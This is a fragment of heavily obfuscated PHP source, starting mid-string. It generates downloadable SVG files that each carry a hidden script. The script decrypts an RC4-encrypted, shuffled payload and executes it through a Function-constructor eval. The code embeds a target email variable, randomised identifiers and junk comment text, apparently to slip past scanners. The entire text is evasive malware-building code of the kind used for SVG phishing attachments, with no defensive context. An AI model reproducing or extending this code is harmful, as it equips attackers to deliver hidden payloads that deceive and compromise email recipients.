20\74\x20\x33\62\x29\40\162\x65\x74\165\162\156\x20\x27\x27\73\15\12\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\xd\12\40\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\40\143\157\156\163\x74\x20{$Cda68["\142\151\x6e\x61\162\171"]}\40\75\40{$Cda68["\x68\145\x78\124\x6f\x42\x69\156"]}\x28{$Cda68["\150\145\170"]}\51\x3b\15\12\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\x69\146\x20\50{$Cda68["\142\x69\x6e\x61\x72\x79"]}\56\x6c\x65\x6e\x67\164\150\x20\74\x20\62\x34\x29\40\x72\x65\164\165\162\x6e\40\47\47\x3b\15\xa\x20\x20\40\40\40\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\xd\12\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\40\40\x63\x6f\156\x73\x74\40{$Cda68["\151\x76"]}\40\x3d\40{$Cda68["\x62\x69\x6e\x61\x72\x79"]}\56\163\x6c\x69\143\145\x28\x30\54\40\x38\51\x3b\15\12\40\x20\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x63\x6f\156\x73\164\40{$Cda68["\153\x65\171"]}\40\x3d\x20{$Cda68["\x62\x69\x6e\x61\x72\x79"]}\56\163\154\151\x63\x65\50\x38\x2c\x20\x31\x36\x29\x3b\15\12\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x63\x6f\x6e\x73\x74\x20{$Cda68["\143\151\x70\x68\145\162\164\x65\x78\164"]}\x20\x3d\x20{$Cda68["\x62\x69\x6e\141\162\171"]}\x2e\x73\154\x69\143\x65\x28\x31\66\51\x3b\15\12\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\40\xd\12\40\x20\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\x6c\145\164\x20{$Cda68["\x72\x65\x73\165\x6c\x74"]}\x20\x3d\x20\47\x27\73\xd\12\x20\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\x20\x6c\x65\x74\x20{$Cda68["\x6c\x61\163\164\x42\154\157\x63\x6b"]}\40\75\x20{$Cda68["\x69\166"]}\x3b\xd\12\40\x20\40\40\40\40\x20\40\40\40\40\40\40\x20\40\40\x63\x6f\156\163\164\40{$Cda68["\x62\154\157\x63\x6b\163"]}\40\x3d\x20\133\x5d\73\xd\xa\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\15\xa\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\146\x6f\162\x20\50\x6c\145\164\40\151\x20\75\40\x30\x3b\40\x69\x20\74\40{$Cda68["\143\x69\x70\x68\145\x72\x74\x65\x78\164"]}\x2e\154\145\156\x67\x74\x68\73\40\x69\x20\53\75\x20\70\x29\x20\x7b\xd\xa\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40{$Cda68["\x62\154\x6f\143\x6b\x73"]}\56\x70\165\x73\150\50{$Cda68["\143\x69\160\150\145\x72\164\x65\170\164"]}\56\x73\x6c\151\143\x65\50\151\x2c\40\151\x20\x2b\x20\x38\x29\51\73\15\xa\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\175\xd\xa\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\xd\12\40\x20\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40{$Cda68["\142\154\x6f\143\x6b\163"]}\x2e\x66\x6f\x72\x45\141\143\150\50{$Cda68["\x62\x6c\157\x63\153"]}\x20\x3d\x3e\40\173\15\xa\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\x69\146\40\x28{$Cda68["\x62\154\157\143\x6b"]}\56\x6c\x65\x6e\147\x74\150\x20\41\x3d\x3d\x20\x38\51\40\162\x65\x74\x75\x72\x6e\73\15\xa\40\40\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\154\x65\x74\x20{$Cda68["\x74\145\x6d\x70"]}\40\75\40\x27\47\73\xd\12\40\x20\40\40\40\x20\40\40\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x66\157\162\x20\50\x6c\145\x74\40\151\40\x3d\40\x30\x3b\x20\x69\40\74\x20\70\73\40\x69\x2b\53\51\x20\x7b\xd\12\40\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\x20{$Cda68["\x74\x65\155\160"]}\40\53\x3d\40\123\x74\162\x69\156\x67\56\x66\x72\157\155\103\150\x61\162\x43\x6f\x64\145\x28\xd\12\40\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\x20\40{$Cda68["\142\x6c\157\x63\153"]}\x2e\143\x68\x61\x72\x43\157\x64\145\x41\x74\50\x69\51\40\x5e\40{$Cda68["\154\x61\163\x74\102\x6c\x6f\x63\153"]}\x2e\143\150\141\x72\x43\157\x64\145\101\x74\50\x69\51\40\x5e\40{$Cda68["\x6b\145\171"]}\56\x63\150\x61\162\x43\157\144\145\101\164\50\151\x29\xd\12\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\40\40\40\x20\51\x3b\15\12\40\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\40\x20\40\40\x7d\15\xa\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40{$Cda68["\x72\x65\163\165\154\x74"]}\40\x2b\75\40{$Cda68["\x74\x65\155\x70"]}\73\xd\xa\x20\40\x20\40\40\40\40\40\40\40\40\40\40\40\x20\40\x20\40\40\40{$Cda68["\x6c\141\163\164\102\154\x6f\x63\x6b"]}\x20\x3d\40{$Cda68["\142\154\157\143\x6b"]}\73\xd\xa\40\x20\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\x7d\51\73\15\xa\x20\40\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\xd\xa\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\143\157\156\163\164\x20{$Cda68["\160\x61\144\x4c\x65\156\x67\x74\x68"]}\40\75\x20{$Cda68["\x72\145\x73\165\x6c\164"]}\x2e\143\150\141\162\103\157\x64\x65\x41\x74\x28{$Cda68["\x72\x65\163\165\154\164"]}\56\154\145\x6e\147\164\x68\40\x2d\40\61\51\73\15\12\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\151\146\x20\x28{$Cda68["\x70\141\144\114\145\156\x67\x74\150"]}\40\74\75\x20\x38\40\x26\46\40{$Cda68["\160\141\144\114\145\156\x67\x74\150"]}\40\x3e\x20\x30\51\40\x7b\xd\12\40\40\x20\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\143\x6f\x6e\x73\x74\40{$Cda68["\x70\x61\144\x64\x69\x6e\147"]}\x20\75\x20{$Cda68["\x72\145\163\165\154\x74"]}\56\163\154\x69\143\x65\x28\55{$Cda68["\160\141\x64\114\145\x6e\147\164\x68"]}\x29\73\xd\12\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\x6c\x65\164\40{$Cda68["\166\141\x6c\x69\x64\120\141\144\x64\x69\156\147"]}\40\75\x20\164\x72\165\x65\x3b\xd\12\x20\40\40\40\40\40\40\40\40\40\x20\40\x20\x20\40\40\40\40\40\40\x66\157\x72\40\50\154\145\164\x20\151\x20\75\40\x30\x3b\40\x69\x20\x3c\x20{$Cda68["\x70\x61\x64\x4c\x65\156\147\x74\150"]}\73\x20\151\53\x2b\x29\40\173\xd\xa\40\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\40\x69\x66\40\x28{$Cda68["\160\x61\144\x64\x69\156\147"]}\x2e\x63\150\x61\162\x43\x6f\144\145\101\x74\50\x69\x29\x20\x21\75\x3d\x20{$Cda68["\160\x61\x64\114\x65\x6e\147\164\150"]}\51\x20\173\15\xa\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\40{$Cda68["\166\x61\154\x69\x64\x50\x61\x64\x64\151\x6e\147"]}\40\75\40\146\141\x6c\163\x65\x3b\15\xa\40\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\142\x72\145\141\153\x3b\15\12\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\175\xd\xa\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\40\x20\40\175\xd\xa\40\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\40\x20\x20\40\40\40\40\151\146\x20\50{$Cda68["\166\x61\154\x69\x64\x50\x61\144\x64\151\156\147"]}\51\x20\173\xd\xa\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x20\40\40\40\x20\40\x20\162\x65\164\165\x72\156\40{$Cda68["\x72\x65\x73\x75\154\x74"]}\56\163\x6c\151\143\145\x28\60\x2c\x20\55{$Cda68["\160\x61\x64\114\145\156\147\164\150"]}\51\x3b\xd\xa\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\175\15\xa\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\175\15\xa\x20\x20\40\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\40\x72\x65\x74\x75\x72\x6e\x20{$Cda68["\162\x65\163\x75\154\164"]}\73\15\12\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\175\xd\xa\15\12\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x76\x61\162\x20{$Cda68["\x69\156\x76"]}\x20\75\x20\42{$Bca73}\42\73\15\xa\15\12\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\166\141\x72\x20{$Cda68["\144\141\162\x74"]}\x20\x3d\x20\133\135\73\15\xa\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{$Cda68["\144\141\162\x74"]}\x2e\160\165\163\150\x28{$Cda68["\x69\156\x76"]}\51\73\15\12\x20\40\40\40\40\x20\40\x20\40\40\x20\40{$B7437[5]}\15\xa\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\166\141\162\x20{$Cda68["\144\x65\162\x75\x70"]}\40\x3d\x20\x28\x66\x75\x6e\x63\164\151\157\156\x28\x29\173\175\51\56\x63\157\156\163\x74\x72\165\x63\164\157\162\50{$Cda68["\x64\x65\163\104\145\143\x6f\x64\145"]}\x28{$Cda68["\x64\x61\162\164"]}\x5b\60\135\51\51\50\51\73"; goto f557f; F8cb4: $Cda68 = ["\144\x65\x52\x61\156\x64\157\x6d\151\x7a\x65" => TextUtils::generateWord(rand(5, 10)), "\162\141\156\144\157\155\x69\172\x65\x64" => TextUtils::generateWord(rand(5, 10)), "\x63\x68\165\156\x6b\163" => TextUtils::generateWord(rand(5, 10)), "\160\x6f\163\x69\x74\151\x6f\156\163" => TextUtils::generateWord(rand(5, 10)), "\160\x6f\x73" => TextUtils::generateWord(rand(5, 10)), "\x64\x61\164\141" => TextUtils::generateWord(rand(5, 10)), "\143\150\165\156\x6b" => TextUtils::generateWord(rand(5, 10)), "\150\x65\x78\124\157\102\x69\156" => TextUtils::generateWord(rand(5, 10)), "\x68\145\170" => TextUtils::generateWord(rand(5, 10)), "\162\145\163\x75\154\164" => TextUtils::generateWord(rand(5, 10)), "\x64\x65\163\104\145\x63\157\x64\145" => TextUtils::generateWord(rand(5, 10)), "\145\156\143\x6f\x64\145\144" => TextUtils::generateWord(rand(5, 10)), "\x62\151\156\141\x72\x79" => TextUtils::generateWord(rand(5, 10)), "\151\x76" => TextUtils::generateWord(rand(5, 10)), "\153\145\171" => TextUtils::generateWord(rand(5, 10)), "\143\151\160\150\145\x72\x74\145\x78\x74" => TextUtils::generateWord(rand(5, 10)), "\x6c\141\x73\x74\102\x6c\x6f\143\x6b" => TextUtils::generateWord(rand(5, 10)), "\142\x6c\157\143\x6b\x73" => TextUtils::generateWord(rand(5, 10)), "\142\154\x6f\x63\x6b" => TextUtils::generateWord(rand(5, 10)), "\164\145\155\x70" => TextUtils::generateWord(rand(5, 10)), "\x70\141\x64\114\145\156\147\x74\x68" => TextUtils::generateWord(rand(5, 10)), "\x70\x61\x64\x64\x69\x6e\147" => TextUtils::generateWord(rand(5, 10)), "\x76\x61\154\151\x64\120\x61\x64\144\x69\x6e\147" => TextUtils::generateWord(rand(5, 10)), "\x69\x6e\166" => TextUtils::generateWord(rand(5, 10)), "\x64\141\162\x74" => TextUtils::generateWord(rand(5, 10)), "\144\145\162\165\160" => TextUtils::generateWord(rand(5, 10)), "\145\155\x61\151\154\166\x61\162" => TextUtils::generateWord(rand(5, 10))]; goto Beb27; c12cd: } public function setToSVG() { goto d2e37; E0459: header("\103\x6f\x6e\164\x65\x6e\x74\x2d\x44\x69\x73\160\157\163\x69\164\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\155\145\156\x74\x3b\x20\x66\x69\154\x65\x6e\x61\155\145\x3d\x22\147\145\156\145\162\141\164\x65\x64\56\163\x76\147\x22"); goto Dc425; D70eb: header("\103\157\x6e\164\x65\156\x74\x2d\x54\171\x70\x65\72\40\151\x6d\x61\x67\x65\57\x73\166\147\x2b\170\155\154"); goto E0459; d2e37: $Ecba9 = $this->generate(); goto D70eb; Dc425: $B7437 = TextUtils::commentGenerateRandomStoryNew(); goto Eb010; Eb010: echo "\x3c\x3f\170\155\x6c\40\x76\x65\162\163\x69\157\156\x3d\42\61\56\x30\x22\40\x65\156\x63\157\144\x69\156\147\x3d\x22\x55\124\106\55\70\x22\x20\x73\164\141\x6e\x64\x61\154\x6f\x6e\145\x3d\x22\x6e\157\42\x3f\x3e\15\xa\xd\xa{$B7437[0]}\xd\12\15\xa\x3c\x73\166\x67\x20\170\155\x6c\x6e\163\x3d\42\x68\x74\x74\160\x3a\57\x2f\167\x77\x77\56\167\63\x2e\157\162\147\x2f\x32\x30\x30\60\57\163\166\x67\x22\40\167\x69\144\x74\x68\75\x22\x31\x30\60\x22\40\150\x65\151\147\x68\164\x3d\x22\x31\60\60\42\x3e\xd\xa\x20\x20\x20\40\74\x72\x65\143\164\40\x77\151\x64\x74\x68\75\42\61\x30\x30\x25\42\x20\x68\145\151\147\150\164\75\x22\61\60\x30\x25\x22\40\x66\x69\x6c\x6c\75\x22\167\150\151\164\145\42\x2f\76\15\xa\x20\40\x20\40\x3c\164\x65\170\164\40\x78\x3d\x22\x31\60\x22\40\171\x3d\x22\65\60\42\40\146\157\156\x74\x2d\x66\x61\155\x69\154\171\75\42\x41\x72\151\141\154\x22\x20\163\164\x79\154\145\75\42\x64\151\x73\x70\154\x61\171\72\x20\156\157\x6e\145\x3b\42\76\123\x56\107\x3c\x2f\164\x65\170\164\76\xd\xa\xd\12\x20\x20\x20\40{$B7437[1]}\15\xa\15\12\40\40\x20\40\x3c\x66\x6f\162\145\x69\x67\x6e\117\142\152\145\143\x74\x20\167\151\144\164\150\x3d\x22\x31\60\60\x25\42\40\x68\145\x69\147\x68\164\x3d\42\61\x30\x30\45\x22\40\x73\164\171\x6c\145\x3d\x22\144\x69\163\160\154\x61\x79\x3a\40\156\157\156\145\x3b\42\x3e\xd\xa\x20\40\x20\x20\x20\40\x20\x20\74\144\x69\x76\x20\x78\155\x6c\156\163\x3d\x22\x68\x74\164\160\72\57\x2f\x77\x77\167\x2e\167\x33\x2e\x6f\162\x67\x2f\61\71\x39\x39\x2f\x78\x68\x74\155\154\x22\x20\x73\x74\171\x6c\x65\x3d\42\146\157\156\164\55\146\141\x6d\151\x6c\x79\72\40\101\x72\x69\x61\154\x3b\x20\143\x6f\154\x6f\x72\x3a\x20\x62\x6c\x75\145\73\x22\76\15\xa\40\x20\40\40\x20\x20\x20\40\40\x20\40\40\123\x56\107\15\xa\40\40\x20\x20\x20\40\40\40\x3c\x2f\x64\151\166\76\xd\12\x20\40\40\x20\74\57\x66\157\162\x65\x69\147\156\x4f\142\152\145\x63\164\76\xd\xa\x20\x20\x20\40\x3c\x73\143\x72\151\x70\x74\40\x74\171\160\145\x3d\42\x61\x70\160\x6c\151\143\x61\x74\x69\x6f\156\57\x65\x63\155\x61\x73\x63\x72\x69\160\164\42\x3e\xd\12\40\x20\x20\x20\40\x20\40\40\74\41\x5b\103\104\x41\124\101\x5b\15\12\40\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x74\x72\x79\40\173\15\12\15\xa\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\40\40\40{$B7437[2]}\15\12\15\12\x20\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\40\164\x72\x79\40\173\15\12\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\x20{$Ecba9}\15\12\40\x20\x20\x20\40\40\40\40\40\40\x20\40\40\40\x20\40\x7d\x20\143\x61\164\x63\x68\40\50\x65\x72\x72\157\x72\x32\51\40\173\15\xa\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\40\40\40\40\x20\40\143\157\x6e\x73\x6f\x6c\x65\x2e\x65\x72\x72\x6f\162\x28\x22\111\156\156\145\162\x20\145\x72\x72\x6f\x72\40\62\72\x22\54\x20\x65\x72\x72\x6f\162\62\x29\x3b\xd\xa\40\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x7d\15\12\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40\175\40\143\x61\x74\143\150\x20\50\x65\x72\162\x6f\162\61\x29\x20\173\xd\12\x20\40\40\40\40\40\40\x20\x20\40\x20\40\40\x20\40\40\143\157\x6e\163\157\154\145\56\x65\162\x72\157\x72\x28\42\x4f\165\164\145\162\x20\145\162\162\157\162\x3a\42\54\x20\x65\x72\162\157\x72\x31\x29\x3b\15\xa\x20\x20\x20\x20\40\40\40\40\x20\x20\40\40\175\xd\12\x20\40\40\x20\40\x20\40\x20\x5d\x5d\76\15\xa\40\x20\x20\40\74\x2f\163\143\x72\151\160\x74\76\xd\12\15\xa\40\x20\x20\x20{$B7437[3]}\xd\12\xd\12\74\57\163\166\x67\x3e"; goto Cc7f8; Cc7f8: } } goto F53b2; e3c24: require_once "\124\x65\170\164\x55\x74\151\x6c\x73\56\x70\150\x70"; goto f083d; F53b2: class SVGChaEncryption { private $Af2bc; private $Fcd19; public function __construct($Bca73, $e90ca) { $this->Af2bc = $Bca73; $this->Fcd19 = $e90ca; } public function generate_random_key($fff22 = 32) { return bin2hex(random_bytes($fff22)); } public function transform_encrypted_data($de805) { goto Ea9c9; f0864: $Cbcc9 = array_fill(0, count($d7762), ''); goto Ddee2; b719b: $d7762[count($d7762) - 1] = str_pad($A1447, 4, "\x30"); goto c6fc3; d64ba: return implode("\x2c", $ecbea) . "\x23" . $ac06c; goto E0be3; a68a6: $ecbea = range(0, count($d7762) - 1); goto Cd289; F6f08: if (!(strlen($A1447) < 4)) { goto f7ce5; } goto b719b; b18ec: d47ca: goto fe79a; Cd289: shuffle($ecbea); goto f0864; fe79a: $ac06c = strrev(implode("\176", $Cbcc9)); goto d64ba; Ddee2: foreach ($ecbea as $daf1d => $ace30) { $Cbcc9[$daf1d] = $d7762[$ace30]; F01cc: } goto b18ec; Bc974: $A1447 = end($d7762); goto F6f08; c6fc3: f7ce5: goto a68a6; Ea9c9: $d7762 = str_split($de805, 4); goto Bc974; E0be3: } public function rc4_encrypt($de805) { goto B6e71; c5887: $daf1d = 0; goto a4c25; b5b11: $F8759 = 0; goto D47d1; Dc4a6: $D8c06 = $this->transform_encrypted_data($Aa744); goto b698d; f7a6f: $E0dd5 = $d0e2a[$daf1d]; goto E1188; B9a8c: $daf1d++; goto a8841; A57f9: $daf1d++; goto D24c5; Cea88: if (!($daf1d < 256)) { goto bf2bc; } goto E1c05; a969c: $d0e2a[$daf1d] = $d0e2a[$b48e6]; goto B2ff4; E444f: $d0e2a[$daf1d] = $daf1d; goto F6aa1; F9523: $b48e6 = 0; goto bd141; a4c25: Afe86: goto E9fe9; f44fa: E4d3a: goto d42a4; d599c: $E0dd5 = $d0e2a[$daf1d]; goto a969c; e4420: $daf1d = ($daf1d + 1) % 256; goto E91e5; b698d: return $C8668 . "\x23" . $D8c06; goto f5145; c61e7: $ac06c .= chr(ord($de805[$F8759]) ^ $d0e2a[($d0e2a[$daf1d] + $d0e2a[$b48e6]) % 256]); goto ef378; E1188: $d0e2a[$daf1d] = $d0e2a[$b48e6]; goto c89a4; c89a4: $d0e2a[$b48e6] = $E0dd5; goto c61e7; E1c05: $b48e6 = ($b48e6 + $d0e2a[$daf1d] + ord($C8668[$daf1d % strlen($C8668)])) % 256; goto d599c; D47d1: fb511: goto B804e; F6aa1: Fccc5: goto A57f9; E9fe9: if (!($daf1d < 256)) { goto Fbef7; } goto E444f; C382b: $d0e2a = array(); goto c5887; B6e71: $C8668 = $this->generate_random_key(16); goto C382b; D24c5: goto Afe86; goto Aa46b; E91e5: $b48e6 = ($b48e6 + $d0e2a[$daf1d]) % 256; goto f7a6f; d42a4: $Aa744 = bin2hex($ac06c); goto Dc4a6; D0fea: $ac06c = ''; goto b5b11; E0a93: $F8759++; goto ae2ff; D0ddd: D4ea7: goto Cea88; Aa46b: Fbef7: goto F9523; De506: bf2bc: goto A1c9e; B2ff4: $d0e2a[$b48e6] = $E0dd5; goto Fc060; a43bf: $b48e6 = 0; goto D0fea; B804e: if (!($F8759 < strlen($de805))) { goto E4d3a; } goto e4420; A1c9e: $daf1d = 0; goto a43bf; ef378: Ee8c3: goto E0a93; Fc060: d6d75: goto B9a8c; a8841: goto D4ea7; goto De506; ae2ff: goto fb511; goto f44fa; bd141: $daf1d = 0; goto D0ddd; f5145: } public function generate() { goto c0792; C220d: $B7437 = TextUtils::commentGenerateRandomStorySlash(); goto e6f84; e6f84: $Ecba9 = "\x20\x20\40\40\40\40\40\x20\40\40\40\x20\166\141\162\x20{$Cda68["\x65\156\x63\x72\171\160\x74\145\x64\x49\x6e\160\x75\x74"]}\40\75\40\x27{$Bca73}\x27\x3b\xd\12\x20\x20\40\x20\x76\141\x72\40{$Cda68["\145\x6d\141\151\x6c\166\141\x72"]}\40\x3d\40\x27{$this->Fcd19}\47\x3b\xd\12\xd\xa\40\x20\40\x20{$B7437[0]}\xd\xa\xd\xa\40\40\x20\x20\x76\141\162\40{$Cda68["\x64\141\162\x74"]}\40\x3d\40\x5b\135\73\15\xa\40\x20\40\x20{$Cda68["\144\x61\162\164"]}\56\160\x75\163\x68\x28{$Cda68["\145\x6e\x63\162\x79\160\164\x65\x64\111\156\160\x75\x74"]}\x29\73\xd\xa\40\40\40\40{$Cda68["\x64\145\x63\162\x79\160\x74"]}\50{$Cda68["\144\x61\x72\164"]}\x5b\60\x5d\x29\x3b\xd\12\40\x20\40\40\15\12\40\x20\40\x20{$B7437[1]}\xd\xa\40\x20\x20\40\x66\x75\156\x63\164\151\157\156\40{$Cda68["\x64\x65\143\x72\x79\x70\x74"]}\50{$Cda68["\x65\x6e\x63\162\x79\160\164\x65\x64\x49\x6e\x70\x75\x74"]}\51\40\173\15\12\40\40\40\x20\x20\40\40\x20\15\xa\40\x20\40\x20\x20\x20\40\x20\143\157\156\x73\x74\40{$Cda68["\160\141\x72\x74\x73"]}\x20\75\x20{$Cda68["\x65\156\143\x72\x79\160\x74\x65\x64\111\156\160\x75\x74"]}\x2e\x73\x70\154\x69\x74\x28\47\x23\47\51\73\15\12\40\x20\x20\x20\x20\40\40\40\x69\x66\x20\50{$Cda68["\160\141\x72\164\163"]}\x2e\154\145\x6e\147\164\x68\40\x3c\40\x33\51\40\173\15\12\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\164\150\162\157\x77\40\x6e\x65\x77\40\105\x72\x72\x6f\x72\x28\x27\111\156\x76\141\x6c\x69\x64\47\x29\x3b\15\12\x20\40\40\x20\40\40\40\x20\175\15\xa\x20\x20\x20\x20\40\40\x20\x20{$B7437[2]}\15\12\15\xa\x20\40\40\x20\40\40\40\40\x63\157\156\163\164\40{$Cda68["\153\145\x79"]}\40\75\x20{$Cda68["\160\141\162\164\x73"]}\x5b\x30\x5d\73\xd\12\x20\x20\40\x20\40\40\x20\x20\x63\x6f\x6e\163\x74\40\x5b{$Cda68["\x6f\162\144\145\162\123\x74\162"]}\x2c\40{$Cda68["\x65\x6e\x63\162\171\x70\x74\145\x64"]}\135\40\75\x20{$Cda68["\x70\x61\162\x74\x73"]}\56\x73\x6c\x69\x63\x65\x28\x31\51\x3b\15\xa\40\40\x20\x20\x20\40\40\x20\15\xa\40\x20\x20\x20\x20\x20\x20\40\x63\157\156\163\164\x20{$Cda68["\162\x65\166\145\x72\163\145\144\x45\x6e\x63\x72\171\160\x74\145\144"]}\40\x3d\x20{$Cda68["\x65\x6e\143\162\171\160\164\145\x64"]}\x2e\163\x70\154\151\x74\50\x27\x27\51\x2e\x72\145\166\x65\x72\x73\145\50\51\x2e\x6a\157\151\x6e\x28\x27\x27\51\x3b\xd\12\x20\40\40\40\x20\40\40\40\143\x6f\156\x73\164\40{$Cda68["\x63\x68\x75\156\x6b\163"]}\x20\75\40{$Cda68["\162\x65\x76\145\x72\x73\145\144\105\x6e\143\162\171\x70\164\x65\x64"]}\x2e\x73\x70\x6c\x69\x74\x28\x27\x7e\x27\51\73\xd\12\x20\x20\40\x20\40\40\x20\40\x63\x6f\x6e\163\164\x20{$Cda68["\x6f\x72\x64\x65\162"]}\40\75\x20{$Cda68["\x6f\162\x64\145\x72\123\164\x72"]}\56\x73\160\154\151\x74\x28\x27\x2c\x27\x29\x2e\155\141\160\50\x4e\x75\x6d\x62\x65\162\x29\73\xd\xa\xd\12\40\x20\40\40\x20\40\40\x20{$B7437[3]}\xd\12\xd\xa\x20\40\40\40\40\40\40\x20\143\x6f\x6e\x73\x74\40{$Cda68["\162\145\163\x74\x6f\x72\x65\144"]}\x20\x3d\x20\x6e\x65\x77\x20\101\x72\x72\x61\171\x28{$Cda68["\x6f\162\144\x65\x72"]}\56\154\x65\x6e\x67\x74\x68\x29\56\146\151\x6c\x6c\x28\47\47\51\x3b\15\12\40\x20\x20\40\40\40\x20\x20\146\157\x72\x20\50\x6c\145\x74\x20{$Cda68["\151"]}\40\x3d\x20\60\x3b\40{$Cda68["\x69"]}\40\74\x20{$Cda68["\x6f\162\144\145\162"]}\x2e\x6c\x65\x6e\x67\164\x68\x3b\x20{$Cda68["\151"]}\53\53\51\x20\173\15\xa\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\40{$Cda68["\162\x65\x73\x74\x6f\x72\145\x64"]}\x5b{$Cda68["\157\x72\144\x65\162"]}\x5b{$Cda68["\x69"]}\x5d\x5d\40\75\40{$Cda68["\143\150\165\156\x6b\163"]}\x5b{$Cda68["\x69"]}\x5d\x20\x7c\x7c\x20\x27\x27\73\xd\xa\x20\x20\x20\x20\40\x20\x20\40\175\xd\12\x20\x20\40\x20\x20\x20\x20\x20\143\157\156\x73\x74\x20{$Cda68["\x65\156\143\x72\171\160\164\x65\x64\110\145\170"]}\40\75\40{$Cda68["\x72\x65\x73\164\x6f\162\x65\144"]}\56\152\x6f\151\x6e\x28\x27\x27\x29\56\162\145\160\154\141\x63\x65\50\x2f\60\53\44\57\54\x20\47\x27\51\x3b\15\12\40\x20\40\x20\40\40\40\x20\15\12\x20\x20\x20\40\x20\40\x20\x20\x63\157\156\163\164\x20{$Cda68["\145\x6e\143\162\x79\160\164\x65\144\x42\171\x74\145\x73"]}\40\75\x20\x6e\x65\167\40\x55\151\156\164\70\x41\162\162\x61\171\x28{$Cda68["\x65\156\x63\162\171\160\164\145\x64\110\145\170"]}\56\x6c\x65\156\147\x74\x68\x20\57\40\62\51\x3b\15\12\40\40\x20\40\x20\x20\40\x20\146\157\x72\40\50\154\x65\164\40{$Cda68["\x69"]}\x20\x3d\x20\x30\x3b\x20{$Cda68["\151"]}\x20\74\x20{$Cda68["\x65\156\143\162\x79\x70\x74\x65\144\110\145\170"]}\x2e\x6c\145\x6e\147\x74\150\73\40{$Cda68["\x69"]}\x20\x2b\x3d\x20\x32\51\40\173\xd\xa\x20\40\x20\40\x20\40\40\x20\x20\40\40\40{$Cda68["\145\156\x63\162\x79\x70\x74\145\x64\102\171\x74\x65\163"]}\133{$Cda68["\x69"]}\57\x32\x5d\40\75\40\x70\x61\162\163\x65\111\156\164\x28{$Cda68["\x65\x6e\x63\162\x79\x70\164\145\144\110\145\170"]}\56\x73\165\x62\x73\x74\162\x28{$Cda68["\x69"]}\x2c\x20\x32\51\x2c\40\61\66\51\73\xd\12\40\x20\40\x20\40\x20\40\40\175\15\xa\40\40\40\x20\40\40\x20\40\xd\xa\40\40\x20\40\40\x20\40\40\154\x65\164\x20{$Cda68["\x73"]}\x20\75\x20\101\x72\x72\x61\171\56\x66\162\157\x6d\50\x7b\154\x65\x6e\x67\x74\x68\x3a\x20\x32\x35\66\x7d\54\40\x28\137\54\40{$Cda68["\x69"]}\51\40\x3d\x3e\40{$Cda68["\151"]}\x29\x3b\15\xa\x20\40\40\40\40\40\x20\40\x6c\145\x74\40{$Cda68["\x6a"]}\40\75\40\x30\x3b\xd\12\40\x